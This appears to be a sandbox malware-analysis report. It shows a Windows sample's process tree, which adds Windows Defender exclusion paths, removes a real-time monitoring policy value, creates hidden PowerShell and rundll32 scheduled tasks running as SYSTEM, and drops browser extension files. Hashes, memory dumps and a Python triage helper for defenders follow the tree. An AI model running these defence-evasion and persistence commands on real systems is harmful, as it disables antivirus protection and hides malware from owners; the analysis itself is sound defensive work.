      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR" /t REG_DWORD /d 0 /reg:32

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR" /t REG_DWORD /d 0 /reg:64

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PHshpGZGOCOU2" /t REG_DWORD /d 0 /reg:32

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PHshpGZGOCOU2" /t REG_DWORD /d 0 /reg:64

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKitbTPXU" /t REG_DWORD /d 0 /reg:32

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKitbTPXU" /t REG_DWORD /d 0 /reg:64

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gIbkOBIdgRUn" /t REG_DWORD /d 0 /reg:32

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gIbkOBIdgRUn" /t REG_DWORD /d 0 /reg:64

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ujRQKhsomqXgC" /t REG_DWORD /d 0 /reg:32

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ujRQKhsomqXgC" /t REG_DWORD /d 0 /reg:64

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\jbMfBZnRCYwXWnVB" /t REG_DWORD /d 0 /reg:32

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\jbMfBZnRCYwXWnVB" /t REG_DWORD /d 0 /reg:64

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv" /t REG_DWORD /d 0 /reg:32

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv" /t REG_DWORD /d 0 /reg:64

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:643⤵
-
    C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gDvErlGsJ" /SC once /ST 05:00:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gDvErlGsJ"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gDvErlGsJ"

    C:\Windows\SysWOW64\cmd.exe
      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

        C:\Windows\SysWOW64\reg.exe
          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

    C:\Windows\SysWOW64\cmd.exe
      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

        C:\Windows\SysWOW64\reg.exe
          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "PihIjSYIYOWYivaIO"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "PihIjSYIYOWYivaIO"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "PihIjSYIYOWYivaIO2"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "PihIjSYIYOWYivaIO2"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "uBIqNqVTLsdVwtoMO"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "uBIqNqVTLsdVwtoMO"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "uBIqNqVTLsdVwtoMO2"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "uBIqNqVTLsdVwtoMO2"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "zufPyHRvXFwOAoMLceE"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "zufPyHRvXFwOAoMLceE"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "zufPyHRvXFwOAoMLceE2"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "zufPyHRvXFwOAoMLceE2"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "ALSnKDtOkAsKnYIkHVn"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "ALSnKDtOkAsKnYIkHVn"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "ALSnKDtOkAsKnYIkHVn2"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "ALSnKDtOkAsKnYIkHVn2"
    C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\PKitbTPXU\lwrzhv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "fErPICTAIBeQfSA" /V1 /F
      - Drops file in Windows directory
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "iyUHVhEGVwjqNkM"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "iyUHVhEGVwjqNkM"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "iyUHVhEGVwjqNkM2"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "iyUHVhEGVwjqNkM2"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "oRuAcxXUHxbxlS"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "oRuAcxXUHxbxlS"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "PTILZxjmSMqDI"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "PTILZxjmSMqDI"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "PTILZxjmSMqDI2"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "PTILZxjmSMqDI2"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "fErPICTAIBeQfSA2" /F /xml "C:\Program Files (x86)\PKitbTPXU\oMnXPgn.xml" /RU "SYSTEM"
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "fErPICTAIBeQfSA"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "fErPICTAIBeQfSA"

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "DHYuWKgDMKXBLX" /F /xml "C:\Program Files (x86)\PHshpGZGOCOU2\dfVGIgT.xml" /RU "SYSTEM"
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "YnGKDWXrXurgq2" /F /xml "C:\ProgramData\jbMfBZnRCYwXWnVB\yDOGyZX.xml" /RU "SYSTEM"
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "uBIqNqVTLsdVwtoMO2" /F /xml "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\jSWGjfx.xml" /RU "SYSTEM"
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "ALSnKDtOkAsKnYIkHVn2" /F /xml "C:\Program Files (x86)\ujRQKhsomqXgC\YfXWsUL.xml" /RU "SYSTEM"
      - Creates scheduled task(s)

    C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1976 -s 268
      - Program crash
C:\Windows\system32\taskeng.exe
  taskeng.exe {1ABF180B-9726-4A10-8976-67692C051CDA} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\gpupdate.exe
          "C:\Windows\system32\gpupdate.exe" /force

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\gpupdate.exe
          "C:\Windows\system32\gpupdate.exe" /force

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\gpupdate.exe
          "C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam

C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam

C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
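The process tree above carries the whole evasion-and-persistence story of this sample, but in raw form it is hard to check. The following Python triage helper is an added example for this report (it is not part of the sandbox output and not the sample's own code): it classifies a handful of command lines copied from the tree, decodes the PowerShell -EncodedCommand payload (base64 of UTF-16LE text, which is what powershell.exe expects), and collects which Windows Defender exclusion paths were written to which registry key and view, and which tasks were created to run as SYSTEM. The sample list is a constructed subset of the tree, one representative line per behaviour; the function and tag names are the example's own.

```python
import base64
import re

# Constructed sample: one representative command line per behaviour, copied
# from the process tree in this report (not a live log feed).
ENCODED = "cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
SAMPLE_COMMANDS = [
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:64',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKitbTPXU" /t REG_DWORD /d 0 /reg:32',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64',
    'schtasks /CREATE /TN "gDvErlGsJ" /SC once /ST 05:00:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand ' + ENCODED + '"',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\PKitbTPXU\lwrzhv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "fErPICTAIBeQfSA" /V1 /F',
    r'schtasks /CREATE /TN "DHYuWKgDMKXBLX" /F /xml "C:\Program Files (x86)\PHshpGZGOCOU2\dfVGIgT.xml" /RU "SYSTEM"',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand ' + ENCODED,
    r'"C:\Windows\system32\gpupdate.exe" /force',
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
VALUE_RE = re.compile(r'/v\s+"([^"]+)"', re.IGNORECASE)
VIEW_RE = re.compile(r"/reg:(32|64)", re.IGNORECASE)
TASK_RE = re.compile(r'/tn\s+"?([^"\s]+)"?', re.IGNORECASE)
RUN_AS_SYSTEM_RE = re.compile(r'/ru\s+"?system"?', re.IGNORECASE)


def decode_encoded_command(cmd):
    """Plaintext of a powershell -EncodedCommand argument, or None.
    The payload must be base64 of UTF-16LE text; anything else is reported as
    None instead of being passed on as garbage."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmd):
    """Behaviour tags for one command line, matching what the tree above shows."""
    low = cmd.lower()
    tags = set()
    if "windows defender\\exclusions\\" in low and " add " in low:
        tags.add("defender_exclusion_add")
    if "disablerealtimemonitoring" in low:
        tags.add("defender_realtime_tamper")  # ADD and DELETE both matter
    if "schtasks" in low and "/create" in low:
        tags.add("schtasks_create")
        if RUN_AS_SYSTEM_RE.search(cmd):
            tags.add("schtasks_runs_as_system")
        if "rundll32" in low:
            tags.add("schtasks_rundll32_action")
        if "/xml" in low:
            tags.add("schtasks_xml_import")  # the action lives in the XML, not on the command line
    if decode_encoded_command(cmd) is not None:
        tags.add("powershell_encoded_command")
    return tags


def triage(commands):
    """Aggregate per-command tags into the facts an analyst wants first."""
    report = {"exclusions": {}, "system_tasks": [], "decoded_powershell": [], "tagged": []}
    for cmd in commands:
        tags = classify(cmd)
        if not tags:
            continue
        report["tagged"].append((cmd, sorted(tags)))
        if "defender_exclusion_add" in tags:
            # /reg:32 on 64-bit Windows lands under Wow6432Node; this sample writes
            # both views and both the local and the Policies key for every path.
            value = VALUE_RE.search(cmd)
            view = VIEW_RE.search(cmd)
            key = "policy" if "\\policies\\" in cmd.lower() else "local"
            path = value.group(1) if value else "<unparsed>"
            report["exclusions"].setdefault(path, set()).add(
                f"{key}/{view.group(1) if view else 'default'}")
        if "schtasks_runs_as_system" in tags:
            task = TASK_RE.search(cmd)
            report["system_tasks"].append(task.group(1) if task else "<unparsed>")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            report["decoded_powershell"].append(decoded)
    return report


if __name__ == "__main__":
    result = triage(SAMPLE_COMMANDS)
    for cmd, tags in result["tagged"]:
        print(", ".join(tags), "<-", cmd[:70])
    print("excluded paths:", result["exclusions"])
    print("tasks running as SYSTEM:", result["system_tasks"])
    print("decoded PowerShell:", set(result["decoded_powershell"]))
```

Run against the sample lines, the decoder yields `start-process -WindowStyle Hidden gpupdate.exe /force`, which is exactly the gpupdate.exe /force child shown under each powershell.EXE instance in the tree; the exclusion map records the Temp path under the local key in the 64-bit view and the Program Files path under the Policies key in the 32-bit view, and the SYSTEM task list names the rundll32 ONLOGON task and the XML-imported task. The tag set is deliberately narrow so that each match can be traced back to a visible command line.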
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\jSWGjfx.xml
Filesize 2KB
MD5 eda91a0f391eb42e15dfdbfd829837cb
SHA1 b25730ff454a76132a27f873c9e4175785801a30
SHA256 dede05112c969db28dca57b8691fd9da2b5cd40942a8e6a3fdf4d09d65cc8d0e
SHA512 ef4b8d293cfc6b482f1bb9e704bab62b796a048425c6fc27624e2b5e4b214c6aaf7caed0f43399b70b186ca9bfb4f0f39eee2b372f04839b524f8d5f41331f04

C:\Program Files (x86)\PHshpGZGOCOU2\dfVGIgT.xml
Filesize 2KB
MD5 8e7fb4e07f24fe3167b8322ca19f2c15
SHA1 548b70484f8b36ab228979a36644dd80d7419625
SHA256 76139a976e7cc1b392c856109554184e6d0d6fd3d9b8d7706043e9b6f764cf54
SHA512 9e3ded44410598ffccfa504b1b7c0c27ecb972a8c32b0f1d1b5c433b419ee4e65e80d8a59d40c347607e9c1a0a11fdd7021c8012ac1793463178a7e57d0e2bff

C:\Program Files (x86)\PKitbTPXU\oMnXPgn.xml
Filesize 2KB
MD5 aa8e2a43be01988ab61cadae768beab2
SHA1 43dcc3879d9db299db64f2b22c10eee528f4b85f
SHA256 60d0045073143f8187ba36e8c891eda54b001ed62c1fd48e18410370339f8d1b
SHA512 56e54f2628587bd54792f8eae75319478022c02727552007f850a62788b9d7ac0b1c21feca7142644f549943be91f4c569673595aa8351c1200f3cc86159cc00

C:\Program Files (x86)\ujRQKhsomqXgC\YfXWsUL.xml
Filesize 2KB
MD5 868ef0349be864a6facc3fc454ead3ab
SHA1 f44dd664ce7d33c82d66292ab5bcbc2485bd2daf
SHA256 83c74debb70dae9bbc540d50ab2334a3a1145d6ded3aa2839ac0ca81f41d28bf
SHA512 fa23cb8869a09aa641ba3ba6d29916c448627bfa77abdc806cadb32143fb674e64fa3c26cc1bba08ab76d756f0787be72cc30f0bf47380b12c17813bb623e2a0
C:\Program Files\Mozilla Firefox\browser\features\{3F73A70E-44C0-48A7-A9B6-A040BC51379C}.xpi
Filesize 641KB
MD5 ac50bd0140816e5b418804edbc3e1872
SHA1 efe2e39b9b58f41bb83a1eb2904b0f8ed5845bee
SHA256 5c1da4d6a7b24bfc09b8cc44cbfa3b0c050a3fdd22a356900cae35ea1aa832ad
SHA512 b9a1777f9acba104812ced2267c47cc83273cd7450fc7b57928804d6528e4098d8afc3c6be6bb02d39bf3d410292a3dfd90b220fbc01a311824da50ab50be156

C:\ProgramData\jbMfBZnRCYwXWnVB\yDOGyZX.xml
Filesize 2KB
MD5 f8689470aa0280ae17c8a02774f07de1
SHA1 78122f485a6984a8c3a5720abe7192bcc3790f53
SHA256 ebe665f769a13bdb1492142ccfd60a00bc59be7152cb808f71faebf676987f8f
SHA512 47bfc2b55d5e867456f87fb86f2f591e3fe3ae54ef2d2bcc006a4e91ce0103f0a326d09d79c90e5038f67164461faf3f10c03c7a4122ddd17108fd2ce05e2d47
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpgljbjinlladnbmjndbjoohkjjcmidj\1.1.0_0\_locales\en\messages.json
Filesize 150B
MD5 33292c7c04ba45e9630bb3d6c5cabf74
SHA1 3482eb8038f429ad76340d3b0d6eea6db74e31bd
SHA256 9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249
SHA512 2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpgljbjinlladnbmjndbjoohkjjcmidj\1.1.0_0\_locales\pt_BR\messages.json
Filesize 161B
MD5 5c5a1426ff0c1128c1c6b8bc20ca29ac
SHA1 0e3540b647b488225c9967ff97afc66319102ccd
SHA256 5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839
SHA512 1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize 7KB
MD5 b37e97501563e623f97a96d35697d0dc
SHA1 b4f9bb5576fade006ef1fcec299f94a57ef10e6c
SHA256 5738c5af409cdab1be8c947d1506733b53757145b697a2b4ee9181591de493fa
SHA512 966c51a69c9f2ec41877033711158ec24dca88359ab41b50d2fb15a1f41f372134f093aa2104e090f88d35a70003831d836fb27f19c6a404e4fb731baeb1c769

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PQ3OO131FZAU599IQTD0.temp
Filesize 7KB
MD5 8f171088924e815e20baa0530ee80240
SHA1 3688b84f9bb8c7556b0121b413cfe04a9545c1d6
SHA256 ef2f58da2a3f67df329277c53da59228b71345c21b453b5392113eb4c1c61103
SHA512 eb6881608c79001a07a56d57fea619b9d9c5332757ebe1b15f62c8080dd38e220d4886f7ae81464040ef6dc00d095ca876be01b68df94161700297bcf9258e73

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YR0879EQDU4B5W6WZF9D.temp
Filesize 7KB
MD5 838c686a6d7375bca89fe219cd76e438
SHA1 0326ba5340de4ad42853b3035444cb8aa9d98065
SHA256 37b98532a6492750ed8d3fb6a54404f15f4b6d43d1258e020eadc19e37d30013
SHA512 efc24f5f64454ef1d0dd9fbcabcb5e92422e6990aeea8410af7783ad007f52d17a246bfdcf4caa686c37d2cf5a1afe30a18a1c7fe4d8379946370741007a42e7

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize 7KB
MD5 aee1ca77323a663cd0f73dab6cd324df
SHA1 b3742864f08d92b8aa682c6a6d5fa68b035f2f69
SHA256 e010e6f0b8e54664aecdf43295666a23d566dc297e0ad37b5d335094a37bdc69
SHA512 e1c49f21fe4885def24d6bf44cd0d5c6557ac12a7bcb064e31a5f406201b2ed38e0915856dac58aa8a0470ff8fa564864f0234763722dd9807cd2d665abacb33
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ox017b3g.default-release\prefs.js
Filesize 6KB
MD5 19666b4dfb8e18cc31339b7bb37c7303
SHA1 bdbe49fda66ec500fd8e7dc38dad8acf09115bed
SHA256 69b892448f4d0dd5384866ce1e8383cb0a95e6bde435e75068628546fa00c618
SHA512 d054f73a863c5d596e829a7553ff21951e213d934b67730f8af199388e7f29b3d2aed301e4664605b5ae33a3d7939d87f581a10a2c8d5b9aed56035b521e7839

C:\Windows\Temp\OrbPdMUPlnYWuuDN\IZsrEunH\nEukBecksDsrAYPv.wsf
Filesize 9KB
MD5 29fe03fcb9d59280fb706177eeb62f47
SHA1 be42316ea918a318164cc0579721c20fc5bcbdac
SHA256 e3dce70cfd7e03ae9b201333139fd25664960615080ce695ceab6ed2abab29ee
SHA512 dce95c767ee0dacbb979fa1c134d150b07a75671fff091c02e9f1f5f84a470795ebe5200ccdbf1ea591b448a2bfd582ad26944b583782565eb5e62e1e6b09a4a
\??\PIPE\srvsvc
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
(these are the digests of zero-length input: this entry is a named-pipe handle captured by the sandbox, not a dropped file)
memory/1556-41-0x000000001B7B0000-0x000000001BA92000-memory.dmp
Filesize 2.9MB

memory/1924-31-0x0000000076C90000-0x0000000076DAF000-memory.dmp
Filesize 1.1MB

memory/1924-32-0x0000000076DB0000-0x0000000076EAA000-memory.dmp
Filesize 1000KB

memory/1976-53-0x0000000003F90000-0x0000000004015000-memory.dmp
Filesize 532KB

memory/1976-89-0x0000000003DB0000-0x0000000003E15000-memory.dmp
Filesize 404KB

memory/1976-2-0x0000000010000000-0x00000000105D3000-memory.dmp
Filesize 5.8MB

memory/2516-12-0x00000000021D0000-0x00000000021D8000-memory.dmp
Filesize 32KB

memory/2516-11-0x000000001B630000-0x000000001B912000-memory.dmp
Filesize 2.9MB

memory/2632-23-0x0000000001EE0000-0x0000000001EE8000-memory.dmp
Filesize 32KB

memory/2632-22-0x000000001B770000-0x000000001BA52000-memory.dmp
Filesize 2.9MB